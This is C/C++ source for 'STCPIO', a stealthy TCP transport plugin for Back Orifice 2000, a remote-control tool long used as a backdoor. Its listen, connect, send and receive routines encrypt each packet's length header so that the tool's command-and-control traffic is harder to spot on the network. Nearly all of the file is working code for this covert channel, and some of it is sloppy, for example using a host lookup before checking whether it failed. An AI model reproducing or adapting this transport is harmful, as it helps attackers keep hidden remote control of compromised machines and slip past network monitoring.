/*	STCPIO Stealthy TCPIO Plugin for Back Orifice 2000
	Copyright (C) 1999, Daniel Roethlisberger

	This module is largely based on TCPIO by dildog@l0pht.com.

	This program is free software; you can redistribute it and/or modify
	it under the terms of the GNU General Public License as published by
	the Free Software Foundation; either version 2 of the License, or
	(at your option) any later version.

	This program is distributed in the hope that it will be useful,
	but WITHOUT ANY WARRANTY; without even the implied warranty of
	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
	GNU General Public License for more details.

	You should have received a copy of the GNU General Public License
	along with this program; if not, write to the Free Software
	Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA

	The author of this program may be contacted at admin@roe.ch.
*/

#include <windows.h>
#include <winsock.h>
#include <iohandler.h>
#include <config.h>
#include <strhandle.h>
#include "bo_stcpio.h"
#include "io_stcp.h"



static IO_HANDLER g_STCPIOH;
	
int _cdecl STCPIO_Insert(void)
{
	// Initialize Winsock 1.1
	WSADATA wsaData;
	if(WSAStartup(MAKEWORD(1,1), &wsaData)!=0) return -1;
	if(LOBYTE(wsaData.wVersion)!=1 || HIBYTE(wsaData.wVersion)!=1) {
		WSACleanup();
		return -1;
	}
	
	return 0;
}

int _cdecl STCPIO_Remove(void)
{
	// Clean up Winsock 1.1
	WSACleanup();
	return 0;
}

void * _cdecl STCPIO_Listen(char *svTarget)
{
	STCPIO_CTX *ctx;

	// Get listen port
	struct in_addr bindAddr;
	bindAddr.S_un.S_addr=INADDR_ANY;
	int nPort=0;

	if(svTarget==NULL) nPort=GetCfgNum(g_szSTCPIOOptions,"Default Port");	
	else if(lstrcmpi(svTarget,"RANDOM")!=0) {
		char svAdr[260],*svPort;
		lstrcpyn(svAdr,svTarget,260);
		svPort=BreakString(svAdr,":");
		if(svPort==NULL) {
			nPort=atoi(svAdr);
		} else {
			bindAddr.S_un.S_addr=inet_addr(svAdr);
			nPort=atoi(svPort);
		}
	}
	
	// Create listener socket
	SOCKET s;
	s=socket(PF_INET,SOCK_STREAM,IPPROTO_TCP);
	if(s==INVALID_SOCKET) return NULL;
	
	BOOL sopt;
	sopt=TRUE;
	setsockopt(s,IPPROTO_TCP,TCP_NODELAY,(char *)&sopt,sizeof(BOOL));
	sopt=TRUE;
	setsockopt(s,SOL_SOCKET,SO_DONTLINGER,(char *)&sopt,sizeof(BOOL));
	
	// Bind socket and listen
	SOCKADDR_IN saddr;
	memset(&saddr,0,sizeof(SOCKADDR_IN));
	saddr.sin_addr=bindAddr;
	saddr.sin_family=AF_INET;
	saddr.sin_port=htons((WORD)nPort);
	
	if(bind(s,(SOCKADDR *) &saddr,sizeof(SOCKADDR_IN))==SOCKET_ERROR) {
		closesocket(s);
		return NULL;
	}
	if(listen(s,SOMAXCONN)!=0) {
		closesocket(s);
		return NULL;
	}
	
	int namelen=sizeof(SOCKADDR_IN);
	getsockname(s,(SOCKADDR *)&saddr,&namelen);

	// Allocate state structure
	ctx=(STCPIO_CTX*)malloc(sizeof(STCPIO_CTX));
	if(ctx==NULL) {
		closesocket(s);
		return NULL;
	}
	ctx->tcps=(TCPSOCKET*)malloc(sizeof(TCPSOCKET));
	if(ctx->tcps==NULL) {
		closesocket(s);
		free(ctx);
		return NULL;
	}

	// Fill in state structure

	ctx->tcps->s=s;
	memset(&(ctx->tcps->rmt),0,sizeof(SOCKADDR_IN));
	
	// Get connect address
	if(bindAddr.S_un.S_addr==INADDR_ANY) {
		char svHostName[256];
		struct hostent *he;
		struct in_addr *pAddr;
		gethostname(svHostName,256);
		he=gethostbyname(svHostName);
		pAddr=(struct in_addr *)he->h_addr_list[0];
		if(he) {
			wsprintf(ctx->tcps->svConnectAddr,"%u.%u.%u.%u:%u",pAddr->S_un.S_un_b.s_b1,pAddr->S_un.S_un_b.s_b2,pAddr->S_un.S_un_b.s_b3,pAddr->S_un.S_un_b.s_b4,ntohs(saddr.sin_port));
		} else {
			lstrcpyn(ctx->tcps->svConnectAddr,"No Connect Addr",256);
		}
	} else {
		lstrcpyn(ctx->tcps->svConnectAddr,svTarget,256);
	}

	// Set up decryption
	ctx->enclen = GenerateEncLen();
	if(ctx->enclen == 0)
		return NULL;

	return ctx;
}

void * _cdecl STCPIO_Accept(void *data, char *svAddr, int nMaxLen)
{
	// Check to see if this is a listening socket
	STCPIO_CTX *ctx=(STCPIO_CTX*)data;
	
	// Check for connection
	fd_set rdfds;
	TIMEVAL tm;

	FD_ZERO(&rdfds);
	FD_SET(ctx->tcps->s,&rdfds);
	
	tm.tv_sec=0;
	tm.tv_usec=0;

	if(select(0,&rdfds,NULL,NULL,&tm)<=0) {
		return 0;
	}

	// Accept socket
	SOCKADDR_IN saddr;
	int len=sizeof(SOCKADDR_IN);
	SOCKET accs;

	accs=accept(ctx->tcps->s,(SOCKADDR *)&saddr,&len);
	if(accs==INVALID_SOCKET) return NULL;

	BOOL sopt;
	sopt=TRUE;
	setsockopt(accs,IPPROTO_TCP,TCP_NODELAY,(char *)&sopt,sizeof(BOOL));
	sopt=TRUE;
	setsockopt(accs,SOL_SOCKET,SO_DONTLINGER,(char *)&sopt,sizeof(BOOL));
	
	STCPIO_CTX* acc_ctx = (STCPIO_CTX*)malloc(sizeof(STCPIO_CTX));
	if(acc_ctx==NULL) {
		closesocket(accs);
		return NULL;
	}
	acc_ctx->tcps=(TCPSOCKET*)malloc(sizeof(TCPSOCKET));
	if(acc_ctx->tcps==NULL) {
		closesocket(accs);
		free(acc_ctx);
		return NULL;
	}

	acc_ctx->tcps->s=accs;
	acc_ctx->tcps->rmt=saddr;
	
	if(nMaxLen>16) {
		wsprintf(svAddr,"%3u.%3u.%3u.%3u",
			saddr.sin_addr.S_un.S_un_b.s_b1,
			saddr.sin_addr.S_un.S_un_b.s_b2,
			saddr.sin_addr.S_un.S_un_b.s_b3,
			saddr.sin_addr.S_un.S_un_b.s_b4);
	}
		
	// Set up decryption
	acc_ctx->enclen = GenerateEncLen();
	if(acc_ctx->enclen == 0)
		return NULL;

	return acc_ctx;
}

void * _cdecl STCPIO_Connect(char *svTarget)
{
	// Create socket
	SOCKET s;
	s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
	if(s==INVALID_SOCKET) return NULL;

	BOOL sopt;
	sopt=TRUE;
	setsockopt(s,IPPROTO_TCP,TCP_NODELAY,(char *)&sopt,sizeof(BOOL));
	sopt=TRUE;
	setsockopt(s,SOL_SOCKET,SO_DONTLINGER,(char *)&sopt,sizeof(BOOL));
	

	// Get target port
	int nPort;
	char svHost[256],*ptr;
	lstrcpyn(svHost,svTarget,256);
	for(ptr=svHost;((*ptr)!=':') && ((*ptr)!=NULL);ptr++);
	if((*ptr)==':') {
		*ptr='\0';
		ptr++;
		nPort=atoi(ptr);
	}
	else nPort=GetCfgNum(g_szSTCPIOOptions,"Default Port");

	// Resolve hostname
	DWORD addr;
	if((addr=inet_addr(svHost))==INADDR_NONE) {
		struct hostent *he=gethostbyname(svHost);
		if(he==NULL) {
			closesocket(s);
			return NULL;
		}
		addr=*(DWORD *)(he->h_addr_list[0]);
	}

	// Create socket address
	SOCKADDR_IN saddr;
	memset(&saddr,0,sizeof(SOCKADDR_IN));
	saddr.sin_addr.S_un.S_addr=addr;
	saddr.sin_family=AF_INET;
	saddr.sin_port=htons((WORD)nPort);
	
	// Connect to remote host
	if(connect(s,(SOCKADDR *)&saddr,sizeof(SOCKADDR_IN))!=0) {
		closesocket(s);
		return NULL;
	}
	
	// Allocate internal state structure
	STCPIO_CTX *ctx = (STCPIO_CTX*)malloc(sizeof(STCPIO_CTX));
	if(ctx==NULL) {
		closesocket(s);
		return NULL;
	}
	ctx->tcps=(TCPSOCKET *)malloc(sizeof(TCPSOCKET));
	if(ctx->tcps==NULL) {
		closesocket(s);
		free(ctx);
		return NULL;
	}
	
	ctx->tcps->s=s;
	ctx->tcps->rmt=saddr;

	// Set up decryption
	ctx->enclen = GenerateEncLen();
	if(ctx->enclen == 0)
		return NULL;

	return ctx;
}

int _cdecl STCPIO_Close(void *ios)
{
	STCPIO_CTX *ctx=(STCPIO_CTX*)ios;
	
	closesocket(ctx->tcps->s);

	free(ctx->tcps);
	free(ctx);
	return 0;
}

char * _cdecl STCPIO_Query(void)
{
	return STCPIO_QUERY_STRING;
}

int _cdecl STCPIO_Recv(void *data, BYTE **pInData, int *pnInDataLen)
{
	STCPIO_CTX *ctx=(STCPIO_CTX *)data;

	// Check socket for readability 
	TIMEVAL tv;
	int nRet;
	tv.tv_sec=0;
	tv.tv_usec=0;
	fd_set rfds;
	FD_ZERO(&rfds);
	FD_SET(ctx->tcps->s,&rfds);
	nRet=select(1,&rfds,NULL,NULL,&tv);
	if(nRet==SOCKET_ERROR) return -1;
	if(nRet==0) return 0;

	// Get encrypted length field
	BYTE* pHeader = (BYTE*)malloc(ctx->enclen);
	if(pHeader == NULL)
		return -1;
	int lenret = recv(ctx->tcps->s, (char*)pHeader, ctx->enclen, MSG_PEEK);
	if(lenret <= 0)
		return -1;
	if(lenret < ctx->enclen)
		return 0;

	// Decrypt length field
	int deccount;
	BYTE* decbuf;

	ENCRYPTION_ENGINE* pEncEngine = g_pEncHandler->GetEngineByID(GetCfgStr(g_szSTCPIOOptions, STCPIO_CONFIG_ENC));
	if(!pEncEngine)
		return -1;
	CEncryptionEngine* cee = (CEncryptionEngine*) new CEncryptionEngine(pEncEngine);
	if(cee->Startup() < 0)
	{
		delete cee;
		return -1;
	}

	cee->CreateNewKeys();

	decbuf = cee->Decrypt((BYTE*)pHeader, ctx->enclen, &deccount);

	free(pHeader);

	if(deccount != sizeof(DWORD))
		return -1;

	// Get data length
	DWORD nPktLen;
	memcpy(&nPktLen, decbuf, sizeof(DWORD));

	cee->Free(decbuf);
	cee->Shutdown();
	delete cee;

	// Make sure we have the rest of the packet
	DWORD len;
	if(ioctlsocket(ctx->tcps->s,FIONREAD,&len) == SOCKET_ERROR)
		return -1;

	if(len < ctx->enclen+nPktLen)
		return 0;

	// Clear off the header
	char* tempBuf = (char*)malloc(ctx->enclen);
	if(tempBuf == NULL)
		return -1;
	lenret = recv(ctx->tcps->s, tempBuf, ctx->enclen, 0);
	if(lenret < ctx->enclen)
		return -1;
	free(tempBuf);
	
	// Allocate buffer for data
	BYTE *buf=(BYTE *)malloc(nPktLen);
	if(buf==NULL) {
		*pInData=NULL;
		*pnInDataLen=0;
		return -1;
	}

	// Receive data
	char *pbuf=(char *)buf;
	int count=nPktLen;
	do {
		lenret=recv(ctx->tcps->s,pbuf,count,0);
		if(lenret==SOCKET_ERROR) {
			free(buf);
			*pInData=NULL;
			*pnInDataLen=0;
			return -1;
		}
		count-=lenret;
		pbuf+=lenret;
		if(count>0) Sleep(20);
	} while(count>0);

	// Pass data back to application
	*pInData=buf;
	*pnInDataLen=nPktLen;
	return 1;
}

int _cdecl STCPIO_Send(void *data, BYTE *pData, int nDataLen)
{
	STCPIO_CTX *ctx=(STCPIO_CTX *)data;

	// Make single packet
	void *pkt = malloc(ctx->enclen+nDataLen);
	if(pkt==NULL)
		return -1;

	// Encrypt length field
	int enccount;
	BYTE* encbuf;

	ENCRYPTION_ENGINE* pEncEngine = g_pEncHandler->GetEngineByID(GetCfgStr(g_szSTCPIOOptions, STCPIO_CONFIG_ENC));
	if(!pEncEngine)
		return -1;
	CEncryptionEngine* cee = (CEncryptionEngine*) new CEncryptionEngine(pEncEngine);
	if(cee->Startup() < 0)
	{
		delete cee;
		return -1;
	}

	cee->CreateNewKeys();

	encbuf = cee->Encrypt((BYTE*)&nDataLen, sizeof(int), &enccount);

	if(ctx->enclen != enccount)
		return -1;

	memcpy(pkt, encbuf, enccount);		// encrypted length field

	cee->Free(encbuf);
	cee->Shutdown();
	delete cee;

	memcpy((((BYTE*)pkt)+ctx->enclen), pData, nDataLen);	// data

	// Send packet
	int ret;
	TIMEVAL tm;
	fd_set wfds;
	FD_ZERO(&wfds);
	FD_SET(ctx->tcps->s,&wfds);
	tm.tv_sec=5;
	tm.tv_usec=0;
	if((ret=select(0,NULL,&wfds,NULL,&tm))>0) {
		char *ppkt=(char *)pkt;
		int count=ctx->enclen+nDataLen;
		do {
			ret=send(ctx->tcps->s,ppkt,count,0);
			if(ret==SOCKET_ERROR) break;

			count-=ret;
			ppkt+=ret;
			if(count>0) Sleep(20);
		} while(count>0);
		free(pkt);
		if(ret==SOCKET_ERROR) return -1;
		return 1;
	}
	free(pkt);
	return ret;
}

void _cdecl STCPIO_Free(void *data, BYTE *pBuffer)
{
	if(pBuffer==NULL) return;
	free(pBuffer);
}

int _cdecl STCPIO_GetConnectAddr(void *data, char *svAddr, int nMaxLen)
{
	STCPIO_CTX *ctx=(STCPIO_CTX *)data;

	if(nMaxLen>256) nMaxLen=256;
	if(nMaxLen<0) return -1;
	lstrcpyn(svAddr,ctx->tcps->svConnectAddr,nMaxLen);
	return 0;
}

IO_HANDLER *GetStealthyTcpIOHandler(void)
{	
	g_STCPIOH.pClose = STCPIO_Close;
	g_STCPIOH.pConnect = STCPIO_Connect;
	g_STCPIOH.pFree = STCPIO_Free;
	g_STCPIOH.pListen = STCPIO_Listen;
	g_STCPIOH.pAccept = STCPIO_Accept;
	g_STCPIOH.pQuery = STCPIO_Query;
	g_STCPIOH.pRecv = STCPIO_Recv;
	g_STCPIOH.pInsert = STCPIO_Insert;
	g_STCPIOH.pRemove = STCPIO_Remove;
	g_STCPIOH.pSend = STCPIO_Send;
	g_STCPIOH.pGetConnectAddr = STCPIO_GetConnectAddr;

	return &g_STCPIOH;
}

// returns length of encoded 4 bytes
int GenerateEncLen()
{
	int count;
	BYTE* outbuf;
	char encbuf[4] = {0x66, 0x66, 0x66, 0x66};

	ENCRYPTION_ENGINE* pEncEngine = g_pEncHandler->GetEngineByID(GetCfgStr(g_szSTCPIOOptions, STCPIO_CONFIG_ENC));
	if(!pEncEngine)
		return -1;
	CEncryptionEngine* cee = (CEncryptionEngine*) new CEncryptionEngine(pEncEngine);
	if(cee->Startup() < 0)
	{
		delete cee;
		return -1;
	}

	cee->CreateNewKeys();

	outbuf = cee->Encrypt((BYTE*)encbuf, sizeof(int), &count);

	cee->Free(outbuf);
	cee->Shutdown();
	delete cee;
	return count;
}



//
///////
//////////////////// Encryption Engine /////////////////////////
///////
//


CEncryptionEngine::CEncryptionEngine(ENCRYPTION_ENGINE *pEngine)
{
	m_pEngine=pEngine;
	m_pData=NULL;
}

CEncryptionEngine::~CEncryptionEngine()
{

}
char *CEncryptionEngine::Query(void)
{
//	return m_pEngine->pQuery();
	return NULL;
}
int CEncryptionEngine::Startup(void)
{
	if(m_pData!=NULL) return -1;
	if(m_pEngine->pStartup==NULL) return 0;
	m_pData=m_pEngine->pStartup();
	if(m_pData==NULL) return -1;
	return 0;
}

int CEncryptionEngine::Shutdown(void)
{
	int ret;
	if(m_pData==NULL) return -1;
	if(m_pEngine->pShutdown==NULL) return 0;
	ret=m_pEngine->pShutdown(m_pData);
	if(ret>=0) m_pData=NULL;

	return ret;
}
int CEncryptionEngine::SetEncryptKey(char *svKey)
{
/*
	if(m_pData==NULL) return -1;
	if(m_pEngine->pSetEncryptKey==NULL) return 0;
	return m_pEngine->pSetEncryptKey(m_pData,svKey);
*/
	return 0;
}

int CEncryptionEngine::SetDecryptKey(char *svKey)
{
/*
	if(m_pData==NULL) return -1;
	if(m_pEngine->pSetDecryptKey==NULL) return 0;
	return m_pEngine->pSetDecryptKey(m_pData,svKey);
*/
	return 0;
}

char *CEncryptionEngine::GetEncryptKey(void)
{
/*
	if(m_pData==NULL) return NULL;
	if(m_pEngine->pGetEncryptKey==NULL) return NULL;
	return m_pEngine->pGetEncryptKey(m_pData);
*/
	return NULL;
}

char *CEncryptionEngine::GetDecryptKey(void)
{
/*
	if(m_pData==NULL) return NULL;
	if(m_pEngine->pGetDecryptKey==NULL) return NULL;
	return m_pEngine->pGetDecryptKey(m_pData);
*/
	return NULL;
}
BYTE *CEncryptionEngine::Encrypt(BYTE *pBuffer,int nBufLen, int *pnOutBufLen)
{
	if(m_pData==NULL) return NULL;
	if(m_pEngine->pEncrypt==NULL) return NULL;
	return m_pEngine->pEncrypt(m_pData,pBuffer,nBufLen,pnOutBufLen);
}
BYTE *CEncryptionEngine::Decrypt(BYTE *pBuffer,int nBufLen, int *pnOutBufLen)
{
	if(m_pData==NULL) return NULL;
	if(m_pEngine->pDecrypt==NULL) return NULL;
	return m_pEngine->pDecrypt(m_pData,pBuffer,nBufLen,pnOutBufLen);
}

int CEncryptionEngine::CreateNewKeys(void)
{
	if(m_pData==NULL) return -1;
	if(m_pEngine->pCreateNewKeys==NULL) return -1;
	return m_pEngine->pCreateNewKeys(m_pData);
}

void CEncryptionEngine::Free(BYTE *pBuffer)
{
	if(m_pData==NULL) return;
	if(m_pEngine->pFree==NULL) return;
	m_pEngine->pFree(m_pData, pBuffer);
}
